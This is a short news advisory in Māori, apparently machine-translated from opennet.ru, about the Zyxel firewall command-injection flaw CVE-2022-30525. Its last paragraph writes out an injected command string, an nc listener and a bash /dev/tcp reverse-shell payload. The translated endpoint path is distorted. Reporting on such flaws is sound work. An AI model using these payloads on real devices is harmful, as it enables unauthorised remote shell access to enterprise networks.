He whakaraeraetanga tino nui (CVE-2022-30525) kua kitea i roto i nga taputapu Zyxel o te raupapa ATP, VPN me te USG FLEX, i hangaia hei whakarite i nga mahi o nga paahi ahi, IDS me te VPN i roto i nga umanga, e taea ai e te kaitukino o waho te mahi waehere i runga i te taputapu kaore he mana kaiwhakamahi me te kore motuhēhēnga. Hei whakahaere i te whakaeke, me kaha te kaitawhai ki te tuku tono ki te taputapu ma te whakamahi i te kawa HTTP/HTTPS. Kua whakatikahia e Zyxel te whakaraeraetanga i roto i te whakahou firmware ZLD 5.30. E ai ki te ratonga Shodan, kei te 16213 nga taputapu whakaraerae kei runga i te whatunga o te ao e whakaae ana ki nga tono ma te HTTP/HTTPS.
Ka mahia te mahi ma te tuku i nga whakahau i hangaia ki te kaihautu tukutuku /ztp/cgi-bin/kaiwhakahaere, ka taea te uru me te kore motuhēhēnga. Ko te raruraru ka puta mai i te kore o te horoi tika i nga tawhā tono i te wa e whakahaere ana i nga whakahau i runga i te punaha ma te whakamahi i te waea os.system i whakamahia i roto i te whare pukapuka lib_wan_settings.py ka mahia i te wa e tukatuka ana i te mahi setWanPortSt.
Hei tauira, ka taea e te kaiwhaiwhai te tuku i te aho "; ping 192.168.1.210;" ka arahi ki te mahi "ping 192.168.1.210" whakahau i runga i te punaha. Kia uru atu koe ki te anga whakahau, ka taea e koe te whakahaere "nc -lvnp 1270" i runga i to punaha, katahi ka timata i te hono whakamuri ma te tuku tono ki te taputapu me te '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Source: opennet.ru